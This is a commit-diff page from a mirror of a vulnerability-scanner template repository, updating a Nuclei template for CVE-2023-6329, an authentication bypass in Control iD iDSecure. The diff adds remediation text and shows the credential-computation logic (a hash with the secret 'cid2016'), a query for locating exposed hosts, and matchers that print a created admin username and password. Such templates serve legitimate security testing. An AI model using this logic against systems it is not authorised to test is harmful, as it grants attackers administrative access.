daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update CVE-2023-6329.yaml

patch-11
Prince Chaddha 2024-09-05 11:12:52 +07:00 committed by GitHub
parent d17a8cea09
commit c34971a3b2
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 11 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
http/cves/2023/CVE-2023-6329.yaml
View File

@ -6,6 +6,10 @@ info:
severity: critical severity: critical
description: | description: |
An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user. An authentication bypass vulnerability exists in Control iD iDSecure v4.7.32.0. The login routine used by iDS-Core.dll contains a "passwordCustom" option that allows an unauthenticated attacker to compute valid credentials that can be used to bypass authentication and act as an administrative user.
impact: |
Successful exploitation could allow an attacker to bypass authentication controls.
remediation: |
Apply the vendor-supplied patch or update to the latest firmware version to mitigate the vulnerability.
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8 cvss-score: 9.8
@ -20,7 +24,7 @@ info:
vendor: controlid vendor: controlid
product: idsecure product: idsecure
fofa-query: body="iDSecure" fofa-query: body="iDSecure"
tags: cve,cve2023,auth-bypass,idsecure,control-id tags: cve,cve2023,auth-bypass,idsecure,control-id,intrusive
variables: variables:
username: "{{rand_base(8)}}" username: "{{rand_base(8)}}"
@ -36,17 +40,16 @@ flow: |
javascript: javascript:
- code: | - code: |
var passwordRandom = passwordRandom; var passwordRandom = passwordRandom;
var sha1Hash = template.sha1Hash; var sha1Hash = template.sha1Hash;
var sha256Hash=(sha256combined.substring(0,6)) var sha256Hash=(sha256combined.substring(0,6))
var passwordCustom = parseInt(sha256Hash, 16).toString(); var passwordCustom = parseInt(sha256Hash, 16).toString();
passwordCustom passwordCustom
args: args:
sha1Hash: "{{sha1Hash}}" sha1Hash: "{{sha1Hash}}"
sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}" sha256combined: "{{ sha256(sha1Hash+passwordRandom+'cid2016') }}"
passwordRandom: "{{passwordRandom}}" passwordRandom: "{{passwordRandom}}"
http: http:
- raw: - raw:
- | - |
@ -114,4 +117,4 @@ http:
- type: dsl - type: dsl
dsl: dsl:
- '"USER: "+ username' - '"USER: "+ username'
- '"PASS: "+ password' - '"PASS: "+ password'